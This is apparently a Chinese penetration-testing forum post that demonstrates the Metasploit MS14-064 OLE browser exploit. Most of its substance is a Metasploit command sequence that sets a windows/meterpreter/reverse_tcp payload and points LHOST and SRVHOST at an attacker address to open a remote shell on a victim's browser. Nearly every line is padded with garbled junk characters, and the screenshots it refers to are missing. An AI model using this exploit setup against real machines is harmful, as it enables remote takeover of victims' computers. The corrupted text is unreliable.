( w: i" X, J' \# q( S 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
; ]; m1 q# ~) ^! a; k) B b2 i$ C- b
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
" Y. s6 u7 W& F' q. l 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
9 W! b+ z( N9 i0 G& o* [ set AllowPowershellPrompt true4 i9 A5 F4 f4 N) L. \, U
Set LHOST 192.168.0.109! S& W) h: a" Q* |8 D# X0 p$ h% J
( M v/ E7 f! [1 f, J1 ^$ u; v1 k set SRVHOST 192.168.0.1090 u3 I* i+ O% D( C# a
Set uripath share
Set srvport 80 _1 U3 Z% w# A% [7 r
& Z$ j* [3 @4 N# O
5 m4 J' s8 v, s' w, ?9 J, |5 I8 T " U8 u6 j z! `' O2 U, H
3 L5 _" a. y% O9 j" _) V) ]* O: I P3 H9 y1 ]& e& b% G5 R
) A2 Q! {/ Z! m9 p) V( |& T 6 F* F, ?7 I5 e8 S- g+ w
y( e& g' o% {" a- l, Y 下面我们来访问本地地址如图:
& D9 x% _+ p5 c" w ) y: }; {3 @4 z& |5 z$ A$ g
7 \; r& f# V/ ]) h" b- H3 `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |